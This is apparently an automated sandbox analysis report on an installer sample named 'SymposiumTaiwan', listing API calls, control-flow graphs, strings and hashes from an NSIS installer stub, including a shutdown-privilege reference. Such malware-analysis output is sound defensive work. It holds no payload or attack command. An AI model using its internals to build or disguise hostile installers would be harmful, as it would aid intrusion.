                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                              • OleUninitialize.OLE32(?), ref: 00403AFD
                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                              • API String ID: 2435955865-3712954417
                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 649 406301-406315 FindFirstFileW 650 406322 649->650 651 406317-406320 FindClose 649->651 652 406324-406325 650->652 651->652
                                              APIs
                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: jF
                                              • API String ID: 2295610775-3349280890
                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 653 406328-40633e GetModuleHandleA 654 406340-406349 LoadLibraryA 653->654 655 40634b-406353 GetProcAddress 653->655 654->655 656 406359-40635b 654->656 655->656
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: AddressHandleLibraryLoadModuleProc
                                              • String ID:
                                              • API String ID: 310444273-0
                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 30 4030ee-4030f2 1->30 4 401601-401611 call 4062cf 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062cf SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062cf call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062cf call 405d85 2->10 11 401672-401686 call 40145c call 4062cf 2->11 12 401693-4016ac call 401446 call 4062cf 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062cf call 404f9e 2->14 15 4016d6-4016db 2->15 16 401736-40173d 2->16 17 401897-4018a7 call 40145c call 406301 2->17 18 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062cf SetForegroundWindow 2->20 4->30 21 401751-401755 ShowWindow 5->21 22 401758-40175f 5->22 61 4019a3-4019a8 6->61 62 40197f-401984 6->62 7->1 67 4019ec-4019f8 7->67 8->1 80 40179a-4017a6 call 4062cf 8->80 91 40166d 9->91 104 401864-40186c 10->104 105 4017de-4017fc call 405d32 CreateDirectoryW 10->105 81 401689-40168e call 404f9e 11->81 86 4016b1-4016b8 Sleep 12->86 87 4016ae-4016b0 12->87 13->30 38 401632-401637 14->38 36 401702-401710 15->36 37 4016dd-4016fd call 401446 15->37 40 4030dd-4030de 16->40 82 4018c2-4018d6 call 4062cf 17->82 83 4018a9-4018bd call 4062cf 17->83 116 401912-401919 18->116 117 40191e-401921 18->117 19->38 39 401647-40164e PostQuitMessage 19->39 20->1 21->22 22->1 43 401765-401769 ShowWindow 22->43 36->1 37->1 38->30 39->38 40->1 57 4030de call 405f7d 40->57 43->1 57->1 74 4019af-4019b2 61->74 73 401986-401989 62->73 62->74 67->1 67->40 73->74 84 40198b-401993 call 406301 73->84 74->1 88 4019b8-4019c5 GetShortPathNameW 74->88 99 4017ab-4017ac 80->99 81->1 82->30 83->30 84->61 109 401995-4019a1 call 406035 84->109 86->1 87->86 88->1 91->30 99->1 107 401890-401892 104->107 108 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 104->108 120 401846-40184e call 4062cf 105->120 121 4017fe-401809 GetLastError 105->121 107->81 108->1 109->74 116->81 122 401923-40192b call 406301 117->122 123 40194a-401950 117->123 136 401853-401854 120->136 126 401827-401832 GetFileAttributesW 121->126 127 40180b-401825 GetLastError call 4062cf 121->127 122->123 137 40192d-401948 call 406c94 call 404f9e 122->137 125 401957-40195d call 4062cf 123->125 125->99 134 401834-401844 call 4062cf 126->134 135 401855-40185e 126->135 127->135 134->136 135->104 135->105 136->135 137->125
                                              APIs
                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                              • ShowWindow.USER32(?), ref: 00401753
                                              • ShowWindow.USER32(?), ref: 00401767
                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                              Strings
                                              • SetFileAttributes failed., xrefs: 004017A1
                                              • Aborting: "%s", xrefs: 0040161D
                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                              • BringToFront, xrefs: 004016BD
                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                              • Rename on reboot: %s, xrefs: 00401943
                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                              • detailprint: %s, xrefs: 00401679
                                              • Call: %d, xrefs: 0040165A
                                              • Sleep(%d), xrefs: 0040169D
                                              • Jump: %d, xrefs: 00401602
                                              • Rename: %s, xrefs: 004018F8
                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                              • Rename failed: %s, xrefs: 0040194B
                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                              • API String ID: 2872004960-3619442763
                                              • Opcode ID: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                              • Opcode Fuzzy Hash: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 267 405958-405970 call 406328 270 405972-405982 call 405f7d 267->270 271 405984-4059bc call 405eff 267->271 280 4059df-405a08 call 403ec1 call 4067aa 270->280 276 4059d4-4059da lstrcatW 271->276 277 4059be-4059cf call 405eff 271->277 276->280 277->276 285 405a9c-405aa4 call 4067aa 280->285 286 405a0e-405a13 280->286 292 405ab2-405ab9 285->292 293 405aa6-405aad call 406831 285->293 286->285 288 405a19-405a41 call 405eff 286->288 288->285 294 405a43-405a47 288->294 296 405ad2-405af7 LoadImageW 292->296 297 405abb-405ac1 292->297 293->292 298 405a49-405a58 call 405d32 294->298 299 405a5b-405a67 lstrlenW 294->299 301 405b92-405b9a call 40141d 296->301 302 405afd-405b3f RegisterClassW 296->302 297->296 300 405ac3-405ac8 call 403ea0 297->300 298->299 304 405a69-405a77 lstrcmpiW 299->304 305 405a8f-405a97 call 40674e call 406035 299->305 300->296 316 405ba4-405baf call 403ec1 301->316 317 405b9c-405b9f 301->317 307 405c61 302->307 308 405b45-405b8d SystemParametersInfoW CreateWindowExW 302->308 304->305 312 405a79-405a83 GetFileAttributesW 304->312 305->285 311 405c63-405c6a 307->311 308->301 318 405a85-405a87 312->318 319 405a89-405a8a call 40677d 312->319 325 405bb5-405bd2 ShowWindow LoadLibraryW 316->325 326 405c38-405c40 call 405073 316->326 317->311 318->305 318->319 319->305 327 405bd4-405bd9 LoadLibraryW 325->327 328 405bdb-405bed GetClassInfoW 325->328 333 405c42-405c48 326->333 334 405c5a-405c5c call 40141d 326->334 327->328 330 405c05-405c36 DialogBoxParamW call 40141d call 403c94 328->330 331 405bef-405bff GetClassInfoW RegisterClassW 328->331 330->311 331->330 333->317 336 405c4e-405c55 call 40141d 333->336 334->307 336->317
                                              APIs
                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                              • lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                              • API String ID: 608394941-2746725676
                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                              • CompareFileTime.KERNEL32(-00000014,?,NathanColeman,NathanColeman,00000000,00000000,NathanColeman,004D70B0,00000000,00000000), ref: 00401AA0
                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$NathanColeman
                                              • API String ID: 4286501637-3261020129
                                              • Opcode ID: 64a9ea902cad21425178e5295187a554c2d9f068c1d21ee6613f60c398aeb4fb
                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                              • Opcode Fuzzy Hash: 64a9ea902cad21425178e5295187a554c2d9f068c1d21ee6613f60c398aeb4fb
                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 428 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 431 403603-403608 428->431 432 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 428->432 433 4037e2-4037e6 431->433 440 403641 432->440 441 403728-403736 call 4032d2 432->441 443 403646-40365d 440->443 447 4037f1-4037f6 441->447 448 40373c-40373f 441->448 445 403661-403663 call 403336 443->445 446 40365f 443->446 452 403668-40366a 445->452 446->445 447->433 450 403741-403759 call 403368 call 403336 448->450 451 40376b-403795 GlobalAlloc call 403368 call 40337f 448->451 450->447 479 40375f-403765 450->479 451->447 477 403797-4037a8 451->477 455 403670-403677 452->455 456 4037e9-4037f0 call 4032d2 452->456 457 4036f3-4036f7 455->457 458 403679-40368d call 405e38 455->458 456->447 464 403701-403707 457->464 465 4036f9-403700 call 4032d2 457->465 458->464 475 40368f-403696 458->475 468 403716-403720 464->468 469 403709-403713 call 4072ad 464->469 465->464 468->443 476 403726 468->476 469->468 475->464 481 403698-40369f 475->481 476->441 482 4037b0-4037b3 477->482 483 4037aa 477->483 479->447 479->451 481->464 484 4036a1-4036a8 481->484 485 4037b6-4037be 482->485 483->482 484->464 486 4036aa-4036b1 484->486 485->485 487 4037c0-4037db SetFilePointer call 405e38 485->487 486->464 488 4036b3-4036d3 486->488 491 4037e0 487->491 488->447 490 4036d9-4036dd 488->490 492 4036e5-4036ed 490->492 493 4036df-4036e3 490->493 491->433 492->464 494 4036ef-4036f1 492->494 493->476 493->492 494->464
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 004035C4
                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                              Strings
                                              • Error launching installer, xrefs: 00403603
                                              • soft, xrefs: 004036A1
                                              • Inst, xrefs: 00403698
                                              • Null, xrefs: 004036AA
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-527102705
                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
